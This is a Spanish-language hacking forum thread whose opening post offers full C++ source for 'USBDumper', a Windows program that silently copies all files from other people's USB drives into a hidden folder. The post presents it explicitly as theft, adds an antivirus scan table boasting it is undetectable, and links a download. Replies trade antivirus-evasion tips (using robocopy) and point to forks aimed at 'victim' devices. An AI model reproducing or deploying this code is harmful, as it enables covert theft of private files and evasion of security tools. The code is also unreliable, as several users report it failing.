USBDumper [Roba todos los archivos de USB Ajenos]

  • 11 Respuestas
  • 10120 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado xxneeco83xx

  • *
  • Underc0der
  • Mensajes: 46
  • Actividad:
    0%
  • Reputación 0
  • ASM/C/C++/VB/Delphi
  • Skype: nico.buzzi
    • Ver Perfil
    • Email

USBDumper [Roba todos los archivos de USB Ajenos]

  • en: Agosto 29, 2015, 07:55:20 pm


Hola, en esta ocasión desarrolle un software que sirve para extraer de forma oculta todos los archivos de un USB, es decir, si vamos a algún lado y en nuestro pendrive llevamos este archivo lo que haremos es ejecutarlo y el resto de los pendrives conectado en el ordenador sus archivos se copiaran de forma oculta dentro de una nueva carpeta llamada USBDumper en donde lleves el archivo.
También funciona si alguien coloca un pendrive en tu ordenador, este copiara los archivos en una carpeta USBDumper donde este el archivo.
Dejo el código y su análisis FUD.




Citar
Codigo del Ejecutable! [C/C++]
Código: C++
  1. #include <windows.h>
  2. #include <shlwapi.h>
  3.  
  4. bool __stdcall ListDirectory ( IN LPSTR lpszDirectory );
  5. bool __stdcall CopyFiles ( IN LPSTR lpszDirectory, IN DWORD Attributes );
  6.  
  7. bool __stdcall ListDirectory ( IN LPSTR lpszDirectory )
  8. {
  9.    
  10.    WIN32_FIND_DATA find;
  11.    HANDLE Search;
  12.  
  13.    char NewDirectory [ lstrlenA ( lpszDirectory ) + MAX_PATH ];
  14.    lstrcpyA ( NewDirectory, lpszDirectory );
  15.    lstrcatA ( NewDirectory, "*" );
  16.  
  17.    Search = FindFirstFileA ( NewDirectory, &find );
  18.    if ( Search == 0L || Search == INVALID_HANDLE_VALUE )
  19.    {
  20.    
  21.       FindClose ( Search );
  22.    
  23.       return false;
  24.    }
  25.    
  26.    while ( FindNextFileA ( Search, & find ) )
  27.    {
  28.  
  29.       char CopyDirectory [ lstrlenA ( lpszDirectory ) + MAX_PATH + lstrlenA ( find.cFileName ) ];
  30.       lstrcpyA ( CopyDirectory, lpszDirectory );
  31.  
  32.       lstrcatA ( CopyDirectory, find.cFileName );
  33.  
  34.       if ( lstrcmpA ( find.cFileName, ".") != 0 && lstrcmpA ( find.cFileName, ".." ) != 0 && find.dwFileAttributes == FILE_ATTRIBUTE_DIRECTORY )
  35.       {
  36.          lstrcatA ( CopyDirectory, "\\" );
  37.      
  38.          ListDirectory ( CopyDirectory );
  39.       }
  40.  
  41.       CopyFiles ( CopyDirectory, find.dwFileAttributes );
  42.      
  43.    }
  44.  
  45.    FindClose ( Search );
  46.    
  47.    return true;
  48. }
  49.  
  50. bool __stdcall CopyFiles ( IN LPSTR lpszDirectory, IN DWORD Attributes )
  51. {
  52.  
  53.    LPSTR Name, PathComplete, Temp, Teme;
  54.    unsigned long len = 0, i = 0;
  55.    bool dirent = false;
  56.  
  57.    if ( ! PathFileExistsA ( "USBDump" ) )
  58.    {
  59.       CreateDirectoryA ( "USBDump", 0L );
  60.    }
  61.    else
  62.    {
  63.       if ( GetFileAttributesA ( "USBDump" ) != FILE_ATTRIBUTE_DIRECTORY )
  64.       {
  65.          CreateDirectoryA ( "USBDump", 0L );
  66.       }
  67.    }
  68.  
  69.    Name = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 + lstrlenA ( lpszDirectory ) ) );
  70.    Teme = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 + lstrlenA ( lpszDirectory ) ) );
  71.    
  72.    if ( Attributes == FILE_ATTRIBUTE_DIRECTORY )
  73.    {
  74.    
  75.       for ( i = lstrlenA ( lpszDirectory ); i > 0; i -- )
  76.       {
  77.          if ( lpszDirectory [ i ] == '.' && lpszDirectory [ i + 1 ] == '.' )
  78.          {
  79.             CopyMemory ( & Teme [ 0 ], & lpszDirectory [ 0 ], ( lstrlenA ( lpszDirectory ) - 3 ) );
  80.             dirent = true;
  81.             break;
  82.          }
  83.       }
  84.    }
  85.    
  86.    if ( dirent )
  87.    {
  88.       for ( i = lstrlenA ( Teme ); i > 0; i -- )
  89.       {
  90.          if ( Teme [ i ] == '\\' )
  91.          {
  92.             CopyMemory ( & Name [ 0 ], & Teme [ i + 1 ], lstrlenA ( Teme ) - ( i - 1 ) );
  93.             GlobalFree ( Teme );
  94.            
  95.             dirent = false;
  96.             break;
  97.          }
  98.       }
  99.      
  100.       Temp = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + lstrlenA ( Name ) + 1 ) );
  101.       CopyMemory ( & Temp [ 0 ], & "USBDump\\", lstrlenA ( "USBDump" ) + 1 );
  102.       CopyMemory ( & Temp [ lstrlenA ( Temp ) ], & Name [ 0 ], lstrlenA ( Name ) );
  103.  
  104.       CreateDirectoryA ( Temp, 0L );
  105.      
  106.       GlobalFree ( Temp );
  107.       GlobalFree ( Teme );
  108.       GlobalFree ( Name );
  109.       GlobalFree ( PathComplete );
  110.      
  111.       return true;
  112.    }
  113.    else
  114.    {
  115.       for ( i = 0; i < lstrlenA ( lpszDirectory ); i ++ )
  116.       {
  117.          if ( lpszDirectory [ i ] == '\\' )
  118.          {
  119.             CopyMemory ( & Name [ 0 ], & lpszDirectory [ i + 1 ], lstrlenA ( lpszDirectory ) - ( i ) );
  120.             dirent = false;
  121.             break;
  122.          }
  123.       }
  124.    }
  125.  
  126.    if ( Attributes != FILE_ATTRIBUTE_DIRECTORY )
  127.    {
  128.       if ( ( Attributes == FILE_ATTRIBUTE_HIDDEN ) || ( Attributes == FILE_ATTRIBUTE_READONLY ) ||
  129.          ( Attributes == FILE_ATTRIBUTE_SYSTEM ) )
  130.       {
  131.  
  132.          SetFileAttributesA ( lpszDirectory, FILE_ATTRIBUTE_NORMAL );
  133.       }
  134.    }
  135.  
  136.    PathComplete = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + lstrlenA ( Name ) + 1 ) );
  137.    CopyMemory ( & PathComplete [ 0 ], & "USBDump\\", lstrlenA ( "USBDump" ) + 1 );
  138.    
  139.    //Name [ lstrlenA ( Name ) ] == '\\' ? len = lstrlenA ( Name ) - 1 : len = lstrlenA ( Name );
  140.    CopyMemory ( & PathComplete [ lstrlenA ( PathComplete ) ], & Name [ 0 ], lstrlenA ( Name ) );
  141.  
  142.    CopyFileA ( lpszDirectory, PathComplete, false );
  143.  
  144.    GlobalFree ( Name );
  145.    GlobalFree ( PathComplete );
  146.    GlobalFree ( Teme );
  147.  
  148.    return true;
  149. }      
  150.  
  151. int __stdcall WinMain ( HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
  152.       LPSTR lpszArgument, int nCmdFunstil )
  153. {
  154.  
  155.    LPSTR Drivers = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), 513 );
  156.    GetLogicalDriveStringsA ( 512, Drivers );
  157.    
  158.    LPSTR Drive = Drivers;
  159.  
  160.    while ( *Drive )
  161.    {
  162.       if ( GetDriveTypeA ( Drive ) == DRIVE_REMOVABLE )
  163.       {
  164.          ListDirectory ( Drive );
  165.       }
  166.    
  167.       Drive += lstrlenA ( Drive ) + 1;
  168.    }
  169.  
  170.    GlobalFree ( Drivers );
  171.  
  172.    return EXIT_SUCCESS;
  173. }
  174.  
  175.  

ANALISIS FUD
You are not allowed to view links. Register or Login

Antivirus   Resultado   Actualización
ALYac      20150805    Clean
AVG      20150805    Clean
AVware      20150805    Clean
Ad-Aware      20150805    Clean
AegisLab      20150805    Clean
Agnitum      20150804    Clean
AhnLab-V3      20150805    Clean
Alibaba      20150803    Clean
Antiy-AVL      20150805    Clean
Arcabit      20150805    Clean
Avast      20150805    Clean
Avira      20150805    Clean
Baidu-International      20150805    Clean
BitDefender      20150805    Clean
Bkav      20150805    Clean
ByteHero      20150805    Clean
CAT-QuickHeal      20150805    Clean
ClamAV      20150805    Clean
Comodo      20150805    Clean
Cyren      20150805    Clean
DrWeb      20150805    Clean
ESET-NOD32      20150805    Clean
Emsisoft      20150805    Clean
F-Prot      20150805    Clean
F-Secure      20150805    Clean
Fortinet      20150804    Clean
GData      20150805    Clean
Ikarus      20150805    Clean
Jiangmin      20150804    Clean
K7AntiVirus      20150805    Clean
K7GW      20150805    Clean
Kaspersky      20150805    Clean
Kingsoft      20150805    Clean
Malwarebytes      20150805    Clean
McAfee      20150805    Clean
McAfee-GW-Edition      20150805    Clean
MicroWorld-eScan      20150805    Clean
Microsoft      20150805    Clean
NANO-Antivirus      20150805    Clean
Panda      20150805    Clean
Qihoo-360      20150805    Clean
Rising      20150731    Clean
SUPERAntiSpyware      20150805    Clean
Sophos      20150805    Clean
Symantec      20150805    Clean
Tencent      20150805    Clean
TheHacker      20150805    Clean
TotalDefense      20150805    Clean
TrendMicro      20150805    Clean
TrendMicro-HouseCall      20150805Clean
VBA32      20150805    Clean
VIPRE      20150805    Clean
ViRobot      20150805    Clean
Zillya      20150805    Clean
Zoner      20150805    Clean
nProtect      20150805    Clean


Link de descarga:
You are not allowed to view links. Register or Login

SIN-PASS
« Última modificación: Abril 03, 2016, 11:48:03 pm por Gabriela »
El arte de crear malware, es algo que solo pocos entienden!


Desconectado jhonas

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
funciona perfectamente. avas.t no lo detecto

Desconectado JOKER666

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
  • Compartir es ser libre!
    • Ver Perfil
    • Email
El antivirus no lo detecta, pero no funciona

Conectado noxonsoftwares

  • *
  • Ex-Staff
  • *****
  • Mensajes: 312
  • Actividad:
    6.67%
  • Country: 00
  • Reputación 7
  • Ayudar es Crecer, Crecer es Mejorar
  • Skype: noxonsoftwares
    • Ver Perfil
    • NOXONSOFTWARES
Yo había hecho uno hace tiempo llamado RoboUSB programado en visual Basic Net. Lo cual hacia de detectar el usb y por medio de robocopy copiaba todo el contenido de la usb. Y si preguntan porque robocopy? ::) Pues el antivirus no detectara algo que ya viene con Windows  ;D ;D

Desconectado Blest777

  • *
  • Underc0der
  • Mensajes: 63
  • Actividad:
    0%
  • Reputación 0
  • Todo es vanidad.
    • Ver Perfil
Lo probé con mi computadora. Pase el USBDumper a la pc y lo descomprí. Después introduje una memoria usb y ejecute el programa y solamente se copiaron a mi computadora los archivos que no estaban en la memoria usb dentro de una carpeta, los demas archivos no se copiaron ni las carpetas de la memoria usb que contenian información dentro. Lo probé en windows 7.

Gracias!
... De las piedras y el aire no proviene el concepto de lo que es bueno y lo que es malo, de la no vida no puede surgir vida.

Desconectado tematica

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:USBDumper [Roba todos los archivos de USB Ajenos]

  • en: Febrero 13, 2018, 05:22:00 pm
Son ustedes unos autenticos artistas, muchas gracias por sus enseñanzas

Desconectado MrKrypton

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 1
  • Un Soldado Da Tiros Y Un Hacker Da Enter
    • Ver Perfil
    • Email
Para que sirve ese codigo que dejaste? Estoy apenas aprendiendo programacion, que hago con ese codigo, muchas gracias buen aporte

Desconectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5677
  • Actividad:
    30%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email
Roba datos de un USB que conectes a la pc

Saludos,
ANTRAX


Desconectado Harrysnoop

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    30%
  • Reputación 0
    • Ver Perfil
Pero en que carpeta que guarda  no hay direccion

Conectado DtxdF

  • *
  • Moderador Global
  • Mensajes: 778
  • Actividad:
    100%
  • Reputación 16
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email
@You are not allowed to view links. Register or Login

Podrías probar:

UsbDumper: underc0de.org/foro/malware/usb-dumper-en-c-codigo-y-ejecutable
UsbDumper (fork para Gnu/Linux y Windows): underc0de.org/foro/malware/usb-dumper-2-0-extrae-los-archivos-de-los-dispositivos-victimas!

~ DtxdF
« Última modificación: Junio 28, 2020, 03:25:22 pm por DtxdF »
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Desconectado Harrysnoop

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    30%
  • Reputación 0
    • Ver Perfil
You are not allowed to view links. Register or Login
@You are not allowed to view links. Register or Login

Podrías probar:

UsbDumper: underc0de.org/foro/malware/usb-dumper-en-c-codigo-y-ejecutable
UsbDumper (fork para Gnu/Linux y Windows): underc0de.org/foro/malware/usb-dumper-2-0-extrae-los-archivos-de-los-dispositivos-victimas!

*******  Si he  ya he probado en windows    el problema es este FUNCIONA  pero no copia **************
C:\Users\Usuario\Desktop\xd\UsbDumper-master>UsbDumper.exe C:\Users\Usuario\Desktop\d
sale esto:
[!!] Esperando pendrive.
  [!!] Esperando pendrive.
  [!!] Esperando pendrive.
  [!!] Esperando pendrive.
  [!!] Esperando pendrive.
  [!!] Pendrive encontrado.
luego esto :
C:\Users\Usuario\Desktop\xd\UsbDumper-master>
ES DECIR NO ME SALE LA TRANFERENCIA DE ARCHIVOS  no copia,  pero a simple vista todo bien pero cuando voy a la carpeta donde se supone que estan los archivo copiados no hay nada :
Nota : en el codigo  claro solo detecta USB con la Unidad E:  por eso mi primer Usb es D:  Tenia que ingresar otro Usb  E:/ y lo detecto pero no logra copiar , alguien sale el por que ? o tendria que modificar el codigo.


~ DtxdF

Desconectado KiddArabic

  • *
  • Underc0der
  • Mensajes: 302
  • Actividad:
    10%
  • Reputación 1
  • Vivir sin sueño no es vivir.
    • Ver Perfil

Re:USBDumper [Roba todos los archivos de USB Ajenos]

  • en: Agosto 05, 2020, 07:49:28 pm
mi antivirus no lo detecta  , que sad! jajaaja . muy buena

 

Archivos PDF y protectores de pantalla roban credenciales de Facebook.

Iniciado por morodog

Respuestas: 0
Vistas: 3455
Último mensaje Enero 26, 2016, 01:06:16 pm
por morodog
Batch Compiler [Convierte tus archivos Bat a Exe][OpenSC]

Iniciado por xxneeco83xx

Respuestas: 2
Vistas: 3264
Último mensaje Agosto 11, 2015, 06:21:19 pm
por xxneeco83xx
Usb Dumper 2.0: ¡Extrae los archivos de los dispositivos víctimas!

Iniciado por DtxdF

Respuestas: 0
Vistas: 340
Último mensaje Abril 17, 2020, 02:18:30 am
por DtxdF
Las modas vuelven: ransomware en archivos PIF

Iniciado por Gabriela

Respuestas: 2
Vistas: 2652
Último mensaje Septiembre 04, 2015, 08:28:33 am
por 79137913
Ver las cabeceras de archivos con extensión desconocida

Iniciado por Gabriela

Respuestas: 0
Vistas: 2327
Último mensaje Octubre 06, 2015, 12:25:26 pm
por Gabriela